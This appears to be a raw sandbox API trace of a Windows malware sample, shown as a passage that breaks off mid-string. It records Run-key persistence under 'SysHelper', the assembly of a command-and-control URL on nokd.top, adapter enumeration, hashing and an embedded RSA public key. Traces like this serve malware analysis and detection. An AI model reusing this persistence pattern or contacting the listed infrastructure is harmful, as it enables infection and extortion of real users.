[0225.120] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0225.120] CloseHandle (hObject=0x0) returned 0 [0225.120] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0225.120] CloseHandle (hObject=0x0) returned 0 [0225.120] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0225.120] CloseHandle (hObject=0x0) returned 0 [0225.120] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a4) returned 0x0 [0225.120] CloseHandle (hObject=0x0) returned 0 [0225.120] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3dc) returned 0x0 [0225.120] CloseHandle (hObject=0x0) returned 0 [0225.121] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x264) returned 0x0 [0225.121] CloseHandle (hObject=0x0) returned 0 [0225.121] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x45c) returned 0x0 [0225.121] CloseHandle (hObject=0x0) returned 0 [0225.121] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x470) returned 0x5a8 [0225.121] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 0 [0225.121] CloseHandle (hObject=0x5a8) returned 1 [0225.121] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x488) returned 0x5a8 [0225.121] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 0 [0225.121] CloseHandle (hObject=0x5a8) returned 1 [0225.121] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x498) returned 0x5a8 [0225.121] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 0 [0225.122] CloseHandle (hObject=0x5a8) returned 1 [0225.122] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4b4) returned 0x5a8 [0225.122] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 0 [0225.122] CloseHandle (hObject=0x5a8) returned 1 [0225.122] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0225.122] CloseHandle (hObject=0x0) returned 0 [0225.122] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x55c) returned 0x5a8 [0225.122] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0225.124] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x400000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="h1rxxmJek7fnkHTT.exe") returned 0x14 [0225.124] CloseHandle (hObject=0x5a8) returned 1 [0225.124] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5a0) returned 0x5a8 [0225.124] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0225.125] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x400000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="reader_sl.exe") returned 0xd [0225.126] CloseHandle (hObject=0x5a8) returned 1 [0225.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x28) returned 0x659f98 [0225.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31db058 [0225.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31cb190 [0225.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31cc9c8 [0225.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31ccc30 [0225.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31cce98 [0225.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31cd100 [0225.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31cd368 [0225.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31cd5d0 [0225.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31d0c88 [0225.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31d0ef0 [0225.154] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d298 | out: phkResult=0x18d298*=0x5a8) returned 0x0 [0225.155] RegQueryValueExW (in: hKey=0x5a8, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d294, lpData=0x18b9c0, lpcbData=0x18d278*=0x400 | out: lpType=0x18d294*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe\" --AutoStart", lpcbData=0x18d278*=0xe8) returned 0x0 [0225.155] RegCloseKey (hKey=0x5a8) returned 0x0 [0225.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xf0) returned 0x663d60 [0225.155] lstrlenA (lpString="\" --AutoStart") returned 13 [0225.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31885d0 [0225.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x663d60 | out: hHeap=0x630000) returned 1 [0225.155] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe") returned 1 [0225.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31886a8 [0225.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31885d0 | out: hHeap=0x630000) returned 1 [0225.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x28) returned 0x31ec280 [0225.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31d1158 [0225.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31d13c0 [0225.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31d1628 [0225.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31d1890 [0225.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31d1af8 [0225.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31d1d60 [0225.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e0330 [0225.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e0598 [0225.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e0800 [0225.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e0a68 [0225.156] lstrlenA (lpString="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned 46 [0225.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5e) returned 0x711628 [0225.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31d1158, cbMultiByte=-1, lpWideCharStr=0x711628, cchWideChar=47 | out: lpWideCharStr="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned 47 [0225.156] lstrcatW (in: lpString1="", lpString2="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0225.156] lstrlenA (lpString="") returned 0 [0225.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x72fda0 [0225.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31d13c0, cbMultiByte=-1, lpWideCharStr=0x72fda0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0225.156] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0225.156] lstrlenA (lpString="") returned 0 [0225.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x72fdc0 [0225.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31d1628, cbMultiByte=-1, lpWideCharStr=0x72fdc0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0225.156] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0225.157] lstrlenA (lpString="") returned 0 [0225.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x72fd90 [0225.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31d1890, cbMultiByte=-1, lpWideCharStr=0x72fd90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0225.157] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0225.157] lstrlenA (lpString="") returned 0 [0225.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x72fe30 [0225.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31d1af8, cbMultiByte=-1, lpWideCharStr=0x72fe30, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0225.157] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0225.157] lstrlenA (lpString="") returned 0 [0225.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x72fdb0 [0225.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31d1d60, cbMultiByte=-1, lpWideCharStr=0x72fdb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0225.157] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0225.157] lstrlenA (lpString="") returned 0 [0225.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x72fde0 [0225.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31e0330, cbMultiByte=-1, lpWideCharStr=0x72fde0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0225.157] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0225.157] lstrlenA (lpString="") returned 0 [0225.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x72fdf0 [0225.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31e0598, cbMultiByte=-1, lpWideCharStr=0x72fdf0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0225.157] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0225.157] lstrlenA (lpString="") returned 0 [0225.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x72fe50 [0225.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31e0800, cbMultiByte=-1, lpWideCharStr=0x72fe50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0225.157] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0225.157] lstrlenA (lpString="") returned 0 [0225.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x72fe00 [0225.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31e0a68, cbMultiByte=-1, lpWideCharStr=0x72fe00, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0225.158] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0225.158] lstrlenW (lpString="") returned 0 [0225.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x12) returned 0x6534b8 [0225.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x288) returned 0x31d1fc8 [0225.158] GetAdaptersInfo (in: AdapterInfo=0x31d1fc8, SizePointer=0x18d25c | out: AdapterInfo=0x31d1fc8, SizePointer=0x18d25c) returned 0x0 [0225.190] GetAdaptersInfo (in: AdapterInfo=0x31d1fc8, SizePointer=0x18d25c | out: AdapterInfo=0x31d1fc8, SizePointer=0x18d25c) returned 0x0 [0225.203] GetLastError () returned 0x0 [0225.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1000) returned 0x31c2068 [0225.239] GetLastError () returned 0x0 [0225.262] GetLastError () returned 0x0 [0225.271] CryptAcquireContextW (in: phProv=0x18d22c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d22c*=0x694310) returned 1 [0225.322] CryptCreateHash (in: hProv=0x694310, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d234 | out: phHash=0x18d234) returned 1 [0225.322] CryptHashData (hHash=0x672940, pbData=0x31b4ce8, dwDataLen=0x11, dwFlags=0x0) returned 1 [0225.322] CryptGetHashParam (in: hHash=0x672940, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d230, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d230) returned 1 [0225.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x6534d8 [0225.322] CryptGetHashParam (in: hHash=0x672940, dwParam=0x2, pbData=0x6534d8, pdwDataLen=0x18d230, dwFlags=0x0 | out: pbData=0x6534d8, pdwDataLen=0x18d230) returned 1 [0225.322] GetLastError () returned 0x0 [0225.323] CryptDestroyHash (hHash=0x672940) returned 1 [0225.323] CryptReleaseContext (hProv=0x694310, dwFlags=0x0) returned 1 [0225.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b4ce8 | out: hHeap=0x630000) returned 1 [0225.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8710 [0225.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69c408 | out: hHeap=0x630000) returned 1 [0225.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65d640 | out: hHeap=0x630000) returned 1 [0225.323] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x5bc) returned 0x5b4 [0225.583] WaitForSingleObject (hHandle=0x5b4, dwMilliseconds=0xffffffff) returned 0x0 [0226.121] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x5ac [0226.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x28) returned 0x31ec430 [0226.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e0cd0 [0226.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e0f38 [0226.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e11a0 [0226.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e1408 [0226.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e1670 [0226.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e18d8 [0226.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e1b40 [0226.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e1da8 [0226.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e2010 [0226.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x31e2278 [0226.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x3f0) returned 0x31c3070 [0226.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5f1) returned 0x31c3a98 [0226.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x31c3a98, cbMultiByte=1521, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 498 [0226.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x600) returned 0x31c4098 [0226.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c3a98 | out: hHeap=0x630000) returned 1 [0226.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c3070 | out: hHeap=0x630000) returned 1 [0226.134] CryptAcquireContextW (in: phProv=0x18d29c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d29c*=0x694310) returned 1 [0226.183] CryptCreateHash (in: hProv=0x694310, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d2a0 | out: phHash=0x18d2a0) returned 1 [0226.183] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0226.183] CryptHashData (hHash=0x672940, pbData=0x31c4098, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0226.183] CryptGetHashParam (in: hHash=0x672940, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d2a4, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d2a4) returned 1 [0226.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0bc8 [0226.183] CryptGetHashParam (in: hHash=0x672940, dwParam=0x2, pbData=0x31a0bc8, pdwDataLen=0x18d2a4, dwFlags=0x0 | out: pbData=0x31a0bc8, pdwDataLen=0x18d2a4) returned 1 [0226.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x34) returned 0x31de0f0 [0226.183] GetLastError () returned 0x0 [0226.183] lstrcatA (in: lpString1="", lpString2="C2" | out: lpString1="C2") returned="C2" [0226.183] GetLastError () returned 0x0 [0226.184] lstrcatA (in: lpString1="C2", lpString2="2D" | out: lpString1="C22D") returned="C22D" [0226.184] GetLastError () returned 0x0 [0226.184] lstrcatA (in: lpString1="C22D", lpString2="9B" | out: lpString1="C22D9B") returned="C22D9B" [0226.184] GetLastError () returned 0x0 [0226.184] lstrcatA (in: lpString1="C22D9B", lpString2="95" | out: lpString1="C22D9B95") returned="C22D9B95" [0226.184] GetLastError () returned 0x0 [0226.184] lstrcatA (in: lpString1="C22D9B95", lpString2="40" | out: lpString1="C22D9B9540") returned="C22D9B9540" [0226.184] GetLastError () returned 0x0 [0226.184] lstrcatA (in: lpString1="C22D9B9540", lpString2="A5" | out: lpString1="C22D9B9540A5") returned="C22D9B9540A5" [0226.184] GetLastError () returned 0x0 [0226.184] lstrcatA (in: lpString1="C22D9B9540A5", lpString2="66" | out: lpString1="C22D9B9540A566") returned="C22D9B9540A566" [0226.184] GetLastError () returned 0x0 [0226.184] lstrcatA (in: lpString1="C22D9B9540A566", lpString2="CF" | out: lpString1="C22D9B9540A566CF") returned="C22D9B9540A566CF" [0226.184] GetLastError () returned 0x0 [0226.184] lstrcatA (in: lpString1="C22D9B9540A566CF", lpString2="E7" | out: lpString1="C22D9B9540A566CFE7") returned="C22D9B9540A566CFE7" [0226.184] GetLastError () returned 0x0 [0226.185] lstrcatA (in: lpString1="C22D9B9540A566CFE7", lpString2="B5" | out: lpString1="C22D9B9540A566CFE7B5") returned="C22D9B9540A566CFE7B5" [0226.185] GetLastError () returned 0x0 [0226.185] lstrcatA (in: lpString1="C22D9B9540A566CFE7B5", lpString2="6F" | out: lpString1="C22D9B9540A566CFE7B56F") returned="C22D9B9540A566CFE7B56F" [0226.185] GetLastError () returned 0x0 [0226.185] lstrcatA (in: lpString1="C22D9B9540A566CFE7B56F", lpString2="54" | out: lpString1="C22D9B9540A566CFE7B56F54") returned="C22D9B9540A566CFE7B56F54" [0226.185] GetLastError () returned 0x0 [0226.185] lstrcatA (in: lpString1="C22D9B9540A566CFE7B56F54", lpString2="25" | out: lpString1="C22D9B9540A566CFE7B56F5425") returned="C22D9B9540A566CFE7B56F5425" [0226.185] GetLastError () returned 0x0 [0226.185] lstrcatA (in: lpString1="C22D9B9540A566CFE7B56F5425", lpString2="87" | out: lpString1="C22D9B9540A566CFE7B56F542587") returned="C22D9B9540A566CFE7B56F542587" [0226.185] GetLastError () returned 0x0 [0226.185] lstrcatA (in: lpString1="C22D9B9540A566CFE7B56F542587", lpString2="A1" | out: lpString1="C22D9B9540A566CFE7B56F542587A1") returned="C22D9B9540A566CFE7B56F542587A1" [0226.185] GetLastError () returned 0x0 [0226.185] lstrcatA (in: lpString1="C22D9B9540A566CFE7B56F542587A1", lpString2="9C" | out: lpString1="C22D9B9540A566CFE7B56F542587A19C") returned="C22D9B9540A566CFE7B56F542587A19C" [0226.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0bc8 | out: hHeap=0x630000) returned 1 [0226.185] CryptDestroyHash (hHash=0x672940) returned 1 [0226.185] CryptReleaseContext (hProv=0x694310, dwFlags=0x0) returned 1 [0226.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c4098 | out: hHeap=0x630000) returned 1 [0226.186] lstrlenA (lpString="C22D9B9540A566CFE7B56F542587A19C") returned 32 [0226.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x3f0) returned 0x31c3070 [0226.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5f1) returned 0x31c3a98 [0226.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x31c3a98, cbMultiByte=1521, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 498 [0226.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x600) returned 0x31c4098 [0226.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c3a98 | out: hHeap=0x630000) returned 1 [0226.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c3070 | out: hHeap=0x630000) returned 1 [0226.186] lstrcpyA (in: lpString1=0x31cb8e0, lpString2="-----BEGIN PUBLIC 